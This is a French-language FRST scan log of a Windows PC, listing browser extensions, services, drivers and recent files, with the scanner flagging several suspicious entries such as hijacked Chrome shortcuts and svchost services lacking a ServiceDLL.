FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()
FF Plugin-x32: TorchVLC -> C:\Users\pc1\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [Pas de fichier]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\29514203.js [2017-01-27] <==== ATTENTION (Pointe vers un fichier *.cfg)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\29514203.cfg [2017-01-27] <==== ATTENTION
Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default [2017-01-27]
CHR Extension: (Google Slides) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-08]
CHR Extension: (Google Docs) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-08]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-01]
CHR Extension: (Recherche Google) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (ZenMate VPN - Sécurité internet & Unblock) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2016-12-06]
CHR Extension: (Google Sheets) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-08]
CHR Extension: (Google Docs hors connexion) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-01]
CHR Extension: (Skype) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-12-06]
CHR Extension: (Kaspersky Protection) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpeeaghdjmhlakojjcgfdhgcejdaefmi [2017-01-27]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Fast search) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-01-27]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-08]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-01-21]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-05-29]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-19]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-19]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-09]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-19]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-10]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\System Profile [2018-07-17]
CHR HKU\S-1-5-21-813913080-1538114768-4122880109-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION
Opera:
=======
OPR Extension: (Proxy SurfEasy, une Société d'Opera Software) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\ebpielhlnnpkiddeeacoephkilopgblc [2017-07-05]
OPR Extension: (SaveFrom.net helper) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2018-03-20]
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-04-03] (Apple Inc.)
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [98816 2014-10-11] () [Fichier non signé]
S2 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [232528 2017-08-31] (CyberGhost S.A.)
S2 Cluseywreph; C:\Windows\system32\svchost.exe [38792 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 Cluseywreph; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-03-09] (Macrovision Europe Ltd.) [Fichier non signé]
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [255040 2014-08-25] (WildTangent)
S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 GubZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [333688 2018-06-13] (HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [509192 2014-09-02] (Hewlett-Packard Development Company, L.P.)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [351824 2013-02-06] ()
R2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-03-01] ()
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-15] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [Fichier non signé]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [239184 2014-02-15] ()
S2 MTN Online. RunOuc; C:\Program Files (x86)\MTN Online\UpdateDog\ouc.exe [656976 2013-05-21] ()
R2 NoIPDUCService4; C:\Program Files (x86)\No-IP\ducservice.exe [12288 2015-07-20] () [Fichier non signé]
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [Fichier non signé]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-08-19] (Realtek Semiconductor)
R2 SpliCamService; C:\Program Files (x86)\SplitCam\SplitCamService.exe [321064 2016-10-19] (SplitCam Co.)
R2 ss_conn_service; C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-12-03] (DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Fichier non signé]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-09-17] (Synaptics Incorporated)
S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-29] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
R2 TorchCrashHandler; C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe [1216520 2014-06-02] (TorchMedia Inc.) <==== ATTENTION
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
R2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad [212994 ] () [Fichier non signé] <==== ATTENTION <==== ATTENTION
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S2 ed2kidle; "C:\Program Files (x86)\amuleCe\ed2k.exe" -downloadwhenidle [X]
S3 klvssbrigde64; "C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.1\x64\vssbridge64.exe" [X]
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 aswTap; C:\Windows\system32\DRIVERS\aswTap.sys [53904 2017-12-05] (The OpenVPN Project)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 GPIO; C:\Windows\System32\drivers\iaiogpioe.sys [31232 2013-11-11] (Intel Corporation)
S3 huawei_wwanecm; C:\Windows\system32\DRIVERS\ew_juwwanecm.sys [245760 2013-05-28] (Huawei Technologies Co., Ltd.)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ZDDriver.sys [122496 2010-01-19] (ZD Secret Incorporated)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-27] (REALiX(tm))
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-01-23] (Intel Corporation)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [80160 2015-02-13] (McAfee, Inc.)
S1 MpKsl13259c42; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B6017820-EC4E-4598-B3F1-428452ECCF27}\MpKsl13259c42.sys [58120 2018-07-26] () [Fichier non signé]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-19] (Realtek Semiconductor Corp.)
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [580824 2014-09-10] (Realtek Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3593432 2014-10-08] (Realtek Semiconductor Corporation )
R3 scvad_simple; C:\Windows\system32\drivers\SplitCamAudio.sys [23552 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [32496 2014-09-17] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [33008 2014-09-17] (Synaptics Incorporated)
R3 splitcam_hd_driver; C:\Windows\system32\DRIVERS\splitcam_hd_driver.sys [37600 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S1 bindrllc; \??\C:\Windows\system32\drivers\bindrllc.sys [X]
S1 cguzgitl; \??\C:\Windows\system32\drivers\cguzgitl.sys [X]
U2 CWASRE; pas de ImagePath
S3 hmatap; \SystemRoot\system32\DRIVERS\hmatap.sys [X]
S1 lrbfpuox; \??\C:\Windows\system32\drivers\lrbfpuox.sys [X]
S1 okrsbjeh; \??\C:\Windows\system32\drivers\okrsbjeh.sys [X]
U2 snare; pas de ImagePath
U2 WinSnare; pas de ImagePath
S1 yahpbvdi; \??\C:\Windows\system32\drivers\yahpbvdi.sys [X]
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois - Créés - fichiers et dossiers ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2018-07-26 23:42 - 2018-07-26 23:51 - 000044324 _____ C:\Users\pc1\Desktop\FRST.txt
2018-07-26 23:42 - 2018-07-26 23:50 - 000000000 ____D C:\FRST
2018-07-26 23:40 - 2018-07-26 23:40 - 002412544 _____ (Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe
2018-07-26 18:29 - 2007-03-23 16:55 - 000035928 _____ (Adobe Systems Incorporated.) C:\Windows\system32\AdobePDF64.dll
2018-07-23 19:13 - 2018-07-23 19:15 - 066817040 _____ (Matisoft ) C:\Users\pc1\Downloads\Contact-Express (1).exe
2018-07-23 18:43 - 2018-07-23 18:44 - 002901585 _____ C:\Users\pc1\Downloads\bvs_ag_2015_08-09.pdf
2018-07-23 18:32 - 2018-07-23 18:32 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (3).pdf
2018-07-23 16:28 - 2018-07-23 16:29 - 002309248 _____ C:\Users\pc1\Downloads\semaineindustrie2018.0723.xlsx
2018-07-23 16:27 - 2018-07-23 16:27 - 000700326 _____ C:\Users\pc1\Downloads\00_Texte_Revue_Sante_1er_Novembre_2010_.pdf
2018-07-23 16:22 - 2018-07-23 16:22 - 013151503 _____ C:\Users\pc1\Downloads\4com-2018.pdf
2018-07-20 18:55 - 2018-07-20 18:55 - 000000295 _____ C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Corbeille.lnk
2018-07-20 18:51 - 2018-07-25 20:13 - 000000000 ____D C:\Users\pc1\Desktop\app
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2018-07-19 18:15 - 2018-07-19 18:16 - 000410398 _____ C:\Users\pc1\Downloads\declaration de contrat de pret.pdf
2018-07-19 14:37 - 2018-06-20 21:01 - 007398232 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-07-19 14:37 - 2018-06-15 04:01 - 004169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2018-07-19 14:37 - 2018-06-12 09:00 - 022374248 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-07-19 14:37 - 2018-06-12 08:57 - 019790760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-07-19 14:37 - 2018-06-11 17:55 - 025744896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-07-19 14:37 - 2018-06-11 17:06 - 005779968 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-07-19 14:37 - 2018-06-11 16:36 - 015283200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-07-19 14:37 - 2018-06-09 17:40 - 020286976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-07-19 14:37 - 2018-06-09 16:37 - 004496384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-07-19 14:37 - 2018-06-09 16:36 - 013680128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-07-19 14:36 - 2018-06-20 20:44 - 001676064 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-07-19 14:36 - 2018-06-20 20:44 - 001536120 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-07-19 14:36 - 2018-06-20 19:48 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2018-07-19 14:36 - 2018-06-20 19:48 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fxppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2018-07-19 14:36 - 2018-06-11 17:36 - 003119616 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-11 17:14 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-07-19 14:36 - 2018-06-11 17:04 - 000794624 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-07-19 14:36 - 2018-06-11 16:39 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2018-07-19 14:36 - 2018-06-11 16:31 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2018-07-19 14:36 - 2018-06-11 16:22 - 003241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-07-19 14:36 - 2018-06-11 16:11 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-07-19 14:36 - 2018-06-11 15:59 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 17:26 - 002712064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-09 17:09 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-07-19 14:36 - 2018-06-09 16:59 - 000662016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-07-19 14:36 - 2018-06-09 16:37 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2018-07-19 14:36 - 2018-06-09 16:32 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2018-07-19 14:36 - 2018-06-09 16:11 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-07-19 14:36 - 2018-06-09 16:08 - 001313792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-07-19 14:36 - 2018-06-09 16:06 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 03:47 - 002176072 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2018-07-19 14:36 - 2018-06-09 02:44 - 001565528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2018-07-19 14:36 - 2018-06-08 19:26 - 000440832 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 18:54 - 000656384 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2018-07-19 14:36 - 2018-06-08 18:53 - 000252416 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2018-07-19 14:36 - 2018-06-08 18:07 - 000404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 17:44 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2018-07-19 14:36 - 2018-06-07 19:51 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mpsdrv.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 002449752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 000428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2018-07-19 14:36 - 2018-05-15 09:42 - 000590680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000439640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000325456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2018-07-19 14:36 - 2018-05-04 00:02 - 000187728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UCX01000.SYS
2018-07-19 14:36 - 2018-04-26 14:43 - 000918296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
